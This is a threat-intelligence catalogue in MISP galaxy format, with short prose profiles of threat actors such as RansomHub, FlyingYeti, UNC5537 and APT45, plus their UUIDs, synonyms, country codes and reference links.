RansomHub is a rapidly growing ransomware group believed to be an updated version of the older Knight ransomware. They have been linked to attacks exploiting the Zerologon vulnerability to gain initial access. RansomHub has attracted former affiliates of the ALPHV ransomware group and operates as a Ransomware-as-a-Service with a unique affiliate prepayment model. The group has been active in extorting victims and leaking sensitive data to pressure for ransom payments.
Internal MISP references
UUID 9d218bb3-fc59-43e0-a273-a0a0fb5c463e
which can be used as unique global reference for RansomHub
in MISP communities and other software using the MISP galaxy
External references
- https://symantec-enterprise-blogs.security.com/threat-intelligence/ransomhub-knight-ransomware - webarchive
- https://forescoutstage.wpengine.com/blog/analysis-a-new-ransomware-group-emerges-from-the-change-healthcare-cyber-attack/ - webarchive
- https://www.sentinelone.com/blog/ransomware-evolution-how-cheated-affiliates-are-recycling-victim-data-for-profit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Unfading Sea Haze
Unfading Sea Haze is a threat actor focused on espionage, targeting government and military organizations in the South China Sea region since 2018. They employ spear-phishing emails with malicious attachments to gain initial access, followed by the deployment of custom malware such as Gh0st RAT variants and SharpJSHandler. The group utilizes scheduled tasks and manipulates local administrator accounts for persistence, while also incorporating Remote Monitoring and Management tools into their attacks. Unfading Sea Haze demonstrates a sophisticated and patient approach, remaining undetected for years and showing adaptability through evolving exfiltration tactics and malware arsenal.
Internal MISP references
UUID 58e75098-8edc-48ce-b1de-c1a8647e33d3
which can be used as unique global reference for Unfading Sea Haze
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
StucxTeam
Stucx is a threat actor known for targeting Israeli systems, including SCADA systems and the Red Alert missile protection system. Stucx Team has also developed a mobile application called MyOPECS for coordinating attacks, which includes features like DDoS attacks and is expected to add more capabilities in the future. Additionally, they have been observed using VPNs and proxy software to conceal their activities and have a history of making threats against those who cooperate with Israel.
Internal MISP references
UUID ee13ddb3-e8c0-4568-b56c-82d82c30f48b
which can be used as unique global reference for StucxTeam
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
FlyingYeti
FlyingYeti is a Russia-aligned threat actor targeting Ukrainian military entities. They conduct reconnaissance activities and launch phishing campaigns using malware like COOKBOX. FlyingYeti exploits the WinRAR vulnerability CVE-2023-38831 to infect targets with malicious payloads. Cloudforce One has successfully disrupted their operations and provided recommendations for defense against their phishing campaigns.
Internal MISP references
UUID 1dcbad05-c5b7-4ec3-8920-45f396554f7a
which can be used as unique global reference for FlyingYeti
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
SEXi
SEXi is a ransomware group that targets VMware ESXi servers, encrypting data and demanding ransom payments. They have been observed encrypting virtual machines and backups, causing significant disruptions to services. The group's name is a play on the word "ESXi," indicating a deliberate focus on these systems. SEXi has been linked to other ransomware variants based on the Babuk source code.
Internal MISP references
UUID 1bd2034f-a135-4c71-b08f-867b7f9e7998
which can be used as unique global reference for SEXi
in MISP communities and other software using the MISP galaxy
External references
- https://www.cybersecurity-insiders.com/proven-data-restores-powerhosts-vmware-backups-after-sexi-ransomware-attack/ - webarchive
- https://heimdalsecurity.com/blog/powerhosts-esxi-servers-encrypted-with-new-sexi-ransomware/ - webarchive
- https://www.darkreading.com/threat-intelligence/sexi-ransomware-desires-vmware-hypervisors - webarchive
Associated metadata
Metadata key | Value |
---|---|
LilacSquid
LilacSquid is an APT actor targeting a variety of industries worldwide since at least 2021. They use tactics such as exploiting vulnerabilities and compromised RDP credentials to gain access to victim organizations. Their post-compromise activities involve deploying MeshAgent and a customized version of QuasarRAT known as PurpleInk to maintain control over infected systems. LilacSquid has been observed using tools like Secure Socket Funneling for data exfiltration.
Internal MISP references
UUID efacc258-fa0e-4686-99d2-03bab14a640e
which can be used as unique global reference for LilacSquid
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Hunt3r Kill3rs
Hunt3r Kill3rs is a newly emerged threat group claiming expertise in cyber operations, including ICS breaches and web application vulnerabilities exploitation. They have discussed using Java fuzzing in their exploits and have made unverified claims of joint attacks with other threat actors.
Internal MISP references
UUID 4b32ad58-972e-4aa2-be3d-ff875ed06eba
which can be used as unique global reference for Hunt3r Kill3rs
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
UTG-Q-008
UTG-Q-008 is a threat actor targeting Linux platforms, primarily focusing on government and enterprise entities in China. They utilize a massive botnet network for espionage activities, including reconnaissance, brute-forcing, and Trojan component delivery. The actor has a history of compromising thousands of servers in China using a password dictionary based on Chinese Pinyin. UTG-Q-008 operates during standard working hours in the UTC+8 time zone, with potential ties to Eastern Europe.
Internal MISP references
UUID fd17cd3c-5131-4907-be7d-83a0c7dabd36
which can be used as unique global reference for UTG-Q-008
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Gitloker
Gitloker is a threat actor group targeting GitHub repositories, wiping their contents, and extorting victims for their data. They use stolen credentials to compromise accounts, claim to have created a backup, and instruct victims to contact them on Telegram. The attackers leave a ransom note in the form of a README file, urging victims to negotiate the return of their data. GitHub is working to combat these evolving attacks and the vulnerabilities they exploit.
Internal MISP references
UUID 75cc313a-6a95-4ab8-b7f8-bfd7e4a7fe00
which can be used as unique global reference for Gitloker
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC5537
UNC5537 is a financially motivated threat actor targeting Snowflake customer databases. They use stolen credentials obtained from infostealer malware to access and exfiltrate large volumes of data. The compromised accounts lack multi-factor authentication, allowing UNC5537 to conduct data theft and extortion.
Internal MISP references
UUID b8c6da46-4c9a-4075-b9f3-3b5ef7bd3534
which can be used as unique global reference for UNC5537
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Sp1d3r
Sp1d3r, a threat actor, has been involved in multiple data breaches targeting companies like Truist Bank, Cylance, and Advance Auto Parts. They have stolen and attempted to sell sensitive information, including customer and employee emails, account numbers, and source code. Sp1d3r has also claimed to have obtained data from a third-party platform and a cloud storage vendor. They have utilized hacking forums to sell the stolen data for significant sums of money.
Internal MISP references
UUID 2be04e23-4376-4333-87df-27d635e43a98
which can be used as unique global reference for Sp1d3r
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
TA571
TA571 is a spam distributor actor known for delivering a variety of malware, including DarkGate, NetSupport RAT, and information stealers. They use phishing emails with macro-enabled attachments to spread malicious PDFs containing rogue OneDrive links. TA571 has been observed using unique filtering techniques with intermediary "gates" to target specific users and bypass automated sandboxing. Proofpoint assesses with high confidence that TA571 infections can lead to ransomware.
Internal MISP references
UUID 0245113e-cef3-4638-9532-3bf235b07d49
which can be used as unique global reference for TA571
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Bondnet
Bondnet is a threat actor that deploys backdoors and cryptocurrency miners. They use high-performance bots as C2 servers and configure reverse RDP environments on compromised systems. Bondnet has infected over 15,000 Windows server machines worldwide, primarily targeting Windows Server 2008 R2 systems. The botnet is used for mining cryptocurrencies like Monero, ByteCoin, RieCoin, and ZCash, potentially earning the operator thousands of dollars per day.
Internal MISP references
UUID 78e8bc1a-0be3-4792-a911-9d4813dd7bc3
which can be used as unique global reference for Bondnet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0020
Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine's military and defense sectors.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular UAC-0020.
Known Synonyms |
---|
SickSync |
Vermin |
Internal MISP references
UUID 318be739-26fd-4f4d-bac8-aa20ec8273b7
which can be used as unique global reference for UAC-0020
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | RU |
Void Arachne
Void Arachne is a threat actor group targeting Chinese-speaking users with malicious MSI files containing legitimate software installers for AI software. They exploit public interest in VPN technology and AI software to distribute malware through SEO poisoning and Chinese-language-themed Telegram channels. The group's campaign includes bundling malicious Winos payloads with deepfake pornography-generating AI software and voice-and-face-swapping AI software. Void Arachne also promotes AI technologies for virtual kidnapping and uses AI voice-alternating technology to pressure victims into paying ransom.
Internal MISP references
UUID 2ac0db88-8e88-447b-ad44-f781326f5884
which can be used as unique global reference for Void Arachne
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Markopolo
Markopolo is a threat actor known for running scams targeting cryptocurrency users through a fake app called Vortax. They use social media and a dedicated blog to legitimize their malicious activities. Markopolo has been linked to a credential-harvesting operation and is agile in pivoting to new scams when detected. The actor leverages shared hosting and C2 infrastructure for their malicious builds.
Internal MISP references
UUID c1e2121a-84c9-4fd0-99ef-917ded9cb3e1
which can be used as unique global reference for Markopolo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Adrastea
Adrastea is a threat actor who has been active on cybercrime forums, claiming to have breached organizations like MBDA and offering stolen data for sale. They describe themselves as a group of independent cybersecurity experts and researchers. Adrastea has been linked to ransomware operations, data leak platforms, and network access groups. The actor has been known to exploit critical vulnerabilities in target organizations' infrastructure to gain access to sensitive data.
Internal MISP references
UUID b7f37e61-0e1c-4818-9a04-8f83afdd337c
which can be used as unique global reference for Adrastea
in MISP communities and other software using the MISP galaxy
External references
- https://www.cysecurity.news/2022/11/missile-supplier-mbda-breach-disclosed.html - webarchive
- https://www.itsecurityguru.org/2022/09/14/documents-for-sale-on-the-dark-web/ - webarchive
- https://cybershafarat.com/2022/07/31/adrastea-hackers-claim-leading-european-designer-and-manufacturer-of-missile-systems-mbda-hacked/ - webarchive
- https://securityaffairs.co/wordpress/133881/data-breach/mbda-alleged-data-breach.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
JuiceLedger
JuiceLedger is a threat actor known for infostealing through their JuiceStealer .NET assembly. They have evolved from spreading fraudulent applications to conducting supply chain attacks, targeting PyPI contributors with phishing campaigns and typosquatting. Their malicious packages contain a code snippet that downloads and executes JuiceStealer, which has evolved to support additional browsers and Discord. Victims of JuiceLedger attacks are advised to reset passwords and report any suspicious activity to security@pypi.org.
Internal MISP references
UUID 8f4eb6bc-3d3d-49e4-82d8-500c7bb0a2ec
which can be used as unique global reference for JuiceLedger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
RedJuliett
RedJuliett is a likely Chinese state-sponsored threat actor targeting government, academic, technology, and diplomatic organizations in Taiwan. They exploit vulnerabilities in network edge devices for initial access and use SQL injection and directory traversal exploits against web and SQL applications. The group operates from Fuzhou, China, and aims to support Beijing's intelligence collection on Taiwan's economic and diplomatic relations. RedJuliett has also expanded its operations to compromise organizations in other countries such as Hong Kong, Malaysia, and the United States.
Internal MISP references
UUID d20f5398-a362-4c88-b3fb-7e952dcf3948
which can be used as unique global reference for RedJuliett
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
SneakyChef
SneakyChef is a threat actor known for using the SugarGh0st RAT to target government agencies, research institutions, and organizations worldwide. They have been active since at least August 2023, with a focus on leveraging old and new command and control domains. The group has been observed using lures in the form of scanned documents related to Ministries of Foreign Affairs and embassies. Talos Intelligence assesses with medium confidence that the operators are likely Chinese-speaking based on language preferences and specific targets.
Internal MISP references
UUID cdf4506e-09ea-4eb8-b898-b1b5381aa343
which can be used as unique global reference for SneakyChef
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | CN |
ALTDOS
ALTDOS is a threat actor group that has targeted entities in Southeast Asia, including Singapore, Thailand, and Malaysia. They have been involved in data breaches of companies in various sectors, such as real estate and retail, compromising sensitive information like customer names, bank account numbers, and transaction details. ALTDOS uses tactics like ransomware attacks, data exfiltration, and dumping data publicly or for sale on underground forums. The group has been known to demand ransom payments from victims, but also leaks data if demands are not met.
Internal MISP references
UUID 2bd6c045-2ec2-438e-af66-0d97a0163290
which can be used as unique global reference for ALTDOS
in MISP communities and other software using the MISP galaxy
External references
- https://www.databreaches.net/singapore-corporations-making-progress-in-preventing-cyberattacks/ - webarchive
- https://www.databreaches.net/altdos-claims-to-have-hacked-one-of-malaysias-biggest-conglomerates/ - webarchive
- https://www.databreaches.net/advisories-are-published-but-are-enough-entities-reading-them-and-taking-precautions/ - webarchive
- https://www.databreaches.net/singapore-real-estate-firm-breached-by-altdos/ - webarchive
- https://www.databreaches.net/sg-vhive-alerts-consumers-to-cyberattack/ - webarchive
- https://www.databreaches.net/sg-vhive-attackers-escalate-take-control-of-furniture-retailers-email-server/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
BlueHornet
BlueHornet is an advanced persistent threat group targeting government organizations in China, North Korea, Iran, and Russia. They have compromised and leaked data from other APT groups like Kryptonite Panda and Lazarus Group. BlueHornet has been involved in campaigns such as Operation Renminbi, Operation Ruble, and Operation EUSec, focusing on exfiltrating region-specific data and selling it on the dark web. They have also been known to collaborate with different threat actors and have recently disclosed a zero-day exploit in NGINX 1.18.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlueHornet.
Known Synonyms |
---|
APT49 |
AgainstTheWest |
Internal MISP references
UUID 06a615dc-fa13-4d6a-ac8b-3d2a8c9501c4
which can be used as unique global reference for BlueHornet
in MISP communities and other software using the MISP galaxy
External references
- https://cyberint.com/blog/research/bluehornet-one-apt-to-terrorize-them-all/ - webarchive
- https://www.mandiant.com/resources/blog/killnet-new-capabilities-older-tactics - webarchive
- https://www.csoonline.com/article/3684668/cyberattacks-against-governments-jumped-95-in-last-half-of-2022-cloudsek-says.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
HellHounds
Hellhounds is an APT group targeting organizations in Russia, using a modified version of Pupy RAT called Decoy Dog. They gain initial access through vulnerable web services and trusted relationships, with a focus on the public sector and IT companies. The group has been active since at least 2019, maintaining covert presence inside compromised organizations by modifying open-source projects to evade detection. Hellhounds have successfully targeted at least 48 victims, including a telecom operator where they disrupted services.
Internal MISP references
UUID 46ef6903-deac-415a-afaf-97e3ce067d7e
which can be used as unique global reference for HellHounds
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
IntelBroker
IntelBroker is a threat actor known for orchestrating high-profile data breaches targeting companies like Apple, Zscaler, and Facebook Marketplace. They have a reputation for selling access to compromised systems and data on underground forums like BreachForums. IntelBroker has claimed responsibility for breaches involving government agencies such as Europol, the U.S. Department of Transportation, and the Pentagon, leaking sensitive information and classified documents. The actor has been linked to breaches at companies like Acuity, General Electric, and Home Depot, showcasing a pattern of targeting critical infrastructure and major corporations.
Internal MISP references
UUID 849d16c8-eaa3-46e7-9c1c-179ef680922e
which can be used as unique global reference for IntelBroker
in MISP communities and other software using the MISP galaxy
External references
- https://www.cysecurity.news/2024/06/infamous-hacker-intelbroker-breaches.html - webarchive
- https://www.malwarebytes.com/blog/news/2024/06/was-t-mobile-compromised-by-a-zero-day-in-jira - webarchive
- https://securityaffairs.com/164263/cyber-crime/pandabuy-extorted-again.html - webarchive
- https://meterpreter.org/cybersecurity-firm-hacked-sensitive-data-on-sale/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Dragonbridge
DRAGONBRIDGE is a Chinese state-sponsored threat actor known for engaging in information operations to promote the political interests of the People's Republic of China. They have been observed using AI-generated images and videos to spread propaganda on social media platforms. The group has targeted various countries and regions, including the US, Taiwan, and Japan, with narratives promoting pro-PRC viewpoints. DRAGONBRIDGE has been linked to campaigns discrediting the US political system, sowing division between allies, and criticizing specific companies and individuals.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dragonbridge.
Known Synonyms |
---|
Spamouflage Dragon |
Internal MISP references
UUID a4d55f94-d842-400a-acb6-dfee1c446257
which can be used as unique global reference for Dragonbridge
in MISP communities and other software using the MISP galaxy
External references
- https://cloud.google.com/blog/topics/threat-intelligence/prc-dragonbridge-influence-elections/ - webarchive
- https://quointelligence.eu/2024/06/european-election-at-risk-analysis/ - webarchive
- https://blog.google/threat-analysis-group/over-50000-instances-of-dragonbridge-activity-disrupted-in-2022/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Boolka
Boolka is a threat actor known for infecting websites with malicious JavaScript scripts for data exfiltration. They have been carrying out opportunistic SQL injection attacks since at least 2022. Boolka has developed a malware delivery platform based on the BeEF framework and has been distributing the BMANAGER trojan. Their activities demonstrate a progression from basic website infections to more sophisticated malware operations.
Internal MISP references
UUID 99ad0cef-c53a-44d5-85d4-5459e59a06d5
which can be used as unique global reference for Boolka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CloudSorcerer
CloudSorcerer is a sophisticated APT targeting Russian government entities, utilizing cloud infrastructure for stealth monitoring and data exfiltration. The malware leverages APIs and authentication tokens to access cloud resources for command and control, with GitHub serving as its initial C2 server. CloudSorcerer operates as separate modules depending on the process it's running in, executing from a single executable and utilizing complex inter-process communication through Windows pipes. The actor behind CloudSorcerer shows similarities to the CloudWizard APT in modus operandi, but the unique code and functionality suggest it is a new threat actor inspired by previous techniques.
Internal MISP references
UUID 895548a2-e5c7-4a76-8425-19aa077db200
which can be used as unique global reference for CloudSorcerer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Water Sigbin
The 8220 Gang, also known as Water Sigbin, is a threat actor group that focuses on deploying cryptocurrency-mining malware. They exploit vulnerabilities in Oracle WebLogic servers, such as CVE-2017-3506 and CVE-2023-21839, to deliver cryptocurrency miners using PowerShell scripts. The group has demonstrated a sophisticated multistage loading technique to deploy the PureCrypter loader and XMRIG crypto miner. They are known for using obfuscation techniques, such as hexadecimal encoding and code obfuscation, to evade detection and compromise systems.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Water Sigbin.
Known Synonyms |
---|
8220 Gang |
Internal MISP references
UUID 745fd45f-9076-4c88-a977-01940bc0d36e
which can be used as unique global reference for Water Sigbin
in MISP communities and other software using the MISP galaxy
External references
- https://www.trendmicro.com/en_us/research/24/f/water-sigbin-xmrig.html - webarchive
- https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html - webarchive
- https://www.uptycs.com/blog/8220-gang-cryptomining-cloud-based-infrastructure-cyber-threat - webarchive
- https://www.imperva.com/blog/imperva-detects-undocumented-8220-gang-activities/ - webarchive
- https://asec.ahnlab.com/en/51568/ - webarchive
- https://www.trendmicro.com/en_us/research/23/e/8220-gang-evolution-new-strategies-adapted.html - webarchive
- https://blog.aquasec.com/8220-gang-confluence-vulnerability-cve-2022-26134 - webarchive
- https://www.sentinelone.com/blog/from-the-front-lines-8220-gang-massively-expands-cloud-botnet-to-30000-infected-hosts/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | CN |
Void Banshee
Void Banshee is an APT group targeting North America, Europe, and Southeast Asia for information theft and financial gain. They exploit vulnerabilities like CVE-2024-38112 to deliver the Atlantida info-stealer through malicious PDFs disguised as book files. The group uses internet shortcuts with MHTML protocol handlers to access and execute files through disabled Internet Explorer, posing a significant threat to organizations. Void Banshee's TTPs include crafting URL strings to control window sizes in IE and using HTML files to hide malicious downloads from victims.
Internal MISP references
UUID df584835-97da-4e27-ab35-bcd3c5bf7815
which can be used as unique global reference for Void Banshee
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
CRYSTALRAY
CRYSTALRAY is a threat actor known for leveraging open source tools like zmap and SSH-Snake to conduct widespread vulnerability scanning and exploitation. They target victims to collect and sell credentials, deploy cryptominers, and maintain persistence in compromised environments. CRYSTALRAY uses multiple backdoors to control access and spreads through victim networks using SSH-Snake. The actor also uses tools like Platypus for managing victims and extracting sensitive information from compromised systems.
Internal MISP references
UUID feeab818-a9bd-4bff-9923-bf8421abd6c5
which can be used as unique global reference for CRYSTALRAY
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Lifting Zmiy
Rostelecom's security team has discovered a new APT group that is breaching companies via industrial PLCs. Named Lifting Zmiy, the group's first attacks were traced back to October 2023. The group targeted PLCs from Russian company Tech-Automatics usually used with elevators and which were still using their default passwords. Rostelecom has linked the group to intrusions at a Russian government contractor, two telecom operators, and an IT company. The company says the group collected and exfiltrated data and then destroyed the victim's infrastructure. Rostelecom says Lifting Zmiy uses Starlink infrastructure for attacks and appears to operate out of Eastern Europe.
Internal MISP references
UUID b9968b5f-0a5a-4be6-9dd2-428244741323
which can be used as unique global reference for Lifting Zmiy
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Nullbulge
NullBulge is a cybercriminal threat group targeting AI and gaming focused entities. They weaponize code in publicly available repositories to distribute malware, including LockBit ransomware. The group claims to be motivated by a pro-art, anti-AI cause, but their activities indicate a financial focus. NullBulge uses obfuscated code in public repositories and malicious mods to target their victims.
Internal MISP references
UUID 000d8bbf-cb6f-4f7b-89a4-9c136ac4bc5a
which can be used as unique global reference for Nullbulge
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Threat Actor 888
Threat actor 888 is a hacker active in 2024, targeting companies for data breaches. They've hit Microsoft, BMW (Hong Kong), and others in tech, freight, and oil & gas industries
Internal MISP references
UUID 8f31b9b1-44c9-4b7f-b850-7cf02c306e25
which can be used as unique global reference for Threat Actor 888
in MISP communities and other software using the MISP galaxy
External references
- https://cybersecuritynews.com/threats-claimimg-breach/ - webarchive
- https://www.cloudways.com/blog/hacker-allegedly-leaks-data-from-shopify-breach-on-breachforums/ - webarchive
- https://twitter.com/H4ckManac/status/1810569160180515171 - webarchive
- https://medium.com/@DoingFedTime/80-000-records-exposed-in-shell-data-breach-by-threat-actor-888-64c407dfac94 - webarchive
Associated metadata
Metadata key | Value |
---|---|
UAC-0063
UAC-0063 is a threat actor linked to Russian APT28, known for targeting government entities in Ukraine and Central Asia for cyber espionage operations. They utilize keyloggers, backdoors, and malware like Hatvibe and Cherryspy to compromise systems and exfiltrate sensitive information. The group has been active since at least 2021 and has shown interest in targeting organizations in Mongolia, Kazakhstan, Kyrgyzstan, Israel, and India. Their TTPs include spear-phishing campaigns and exploiting vulnerabilities in software products like HFS HTTP File Server and Rejetto file-sharing servers.
Internal MISP references
UUID 9565bf78-7c9c-41cd-9ed0-58031f6d8978
which can be used as unique global reference for UAC-0063
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Stargazer Goblin
Stargazer Goblin is a threat actor group that operates the Stargazers Ghost Network on GitHub, distributing malware and malicious links through multiple accounts. They utilize compromised and created accounts to evade detection and quickly replace banned components to continue their operations. The group has been estimated to have earned approximately $100,000 from their malicious activities, offering a Distribution as a Service platform for other threat actors to distribute their malware. Stargazer Goblin has been involved in distributing various malware families, including Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine.
Internal MISP references
UUID a86e4a0d-95cf-4ce0-b26c-d1fbb7cc84bc
which can be used as unique global reference for Stargazer Goblin
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UAC-0102
UAC-0102 is a threat actor group targeting UKR.NET users through phishing attacks. They distribute emails with HTML file attachments that redirect users to a fraudulent website to steal authentication data. Security teams can use Sigma rules to detect their phishing campaigns and leverage IOCs provided by CERT-UA to hunt for their activity in SIEM or EDR environments.
Internal MISP references
UUID 7dd2e8ee-4232-43f5-9866-006160f19aea
which can be used as unique global reference for UAC-0102
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
APT45
APT45 is a North Korean cyber threat actor that has been active since at least 2009. They have conducted espionage campaigns targeting government agencies and defense industries, as well as financially-motivated operations, including ransomware development. APT45 has targeted critical infrastructure, financial organizations, nuclear research facilities, and healthcare and pharmaceutical companies. They use a mix of publicly available tools, modified malware, and custom malware families in their operations.
Internal MISP references
UUID 02768be6-853c-4239-8fb1-823427489a86
which can be used as unique global reference for APT45
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
country | KP |
TA4903
TA4903 is a financially motivated threat actor known for conducting credential phishing and business email compromise campaigns. They target organizations in the U.S. across various sectors, spoofing government entities and private businesses. The actor has been observed using techniques such as QR codes in phishing campaigns and spoofing supplier domains to prompt victims to provide banking information. TA4903's activities typically involve stealing corporate credentials to facilitate follow-on BEC activities.
Internal MISP references
UUID 1725e1c3-9870-4f66-8962-753c4ed3e086
which can be used as unique global reference for TA4903
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Storm-0506
Storm-0569 is an initial access broker that distributes BATLOADER using search engine optimization (SEO) poisoning with websites that spoof Zoom, TeamViewer, Tableau, and AnyDesk. It uses the loader malware to inject the Cobalt Strike payload and transfers access to Storm-0506 for the deployment of the Black Basta ransomware.
Internal MISP references
UUID d1ad4392-c85a-4f07-9818-a86f805a49f6
which can be used as unique global reference for Storm-0506
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
SAMBASPIDER
SAMBASPIDER is a threat actor associated to the Mispadu malware. On July 24, USDoD allegedly scraped and leaked a 100,000-line Indicator of Compromise list from CrowdStrike, revealing detailed threat intelligence data. The leak, posted on Breach Forums, includes critical insights into the Mispadu malware and SAMBASPIDER threat actor.
Internal MISP references
UUID 0b71d2db-93fe-49b5-a9fd-7f8c94b86637
which can be used as unique global reference for SAMBASPIDER
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
UNC4393
UNC4393 is a financially motivated threat actor primarily using BASTA ransomware. They have been active since early 2022 and have targeted over 40 organizations across various industries. UNC4393 has shown a willingness to cooperate with other threat clusters for initial access and has evolved from using existing tools to developing custom malware. They focus on efficient data exfiltration and multi-faceted extortion, often utilizing tools like COGSCAN and RCLONE for reconnaissance and data theft.
Internal MISP references
UUID 8191e28a-fb2d-4d50-b992-b877807a2f37
which can be used as unique global reference for UNC4393
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Hive0137
Being one of the most active malware distributors, Hive0137 demonstrates a willingness to explore new payloads and technologies such as GenAI. They have quickly moved onto the same level as other high-profile distributors such as TA577, and will likely be responsible for future phishing campaigns, facilitating initial access for ransomware affiliates. Hive0137’s combination of intent, capabilities and relationships with other groups presents a direct threat to organizations all over the world. As threat actors pick up the pace and increasingly adopt AI technologies for malicious purposes, it is important that organizations are aware of the most recent threats and their capabilities to maintain a strong security posture.
Internal MISP references
UUID 34f2d3ad-e367-4058-a10b-1f7a4274c418
which can be used as unique global reference for Hive0137
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|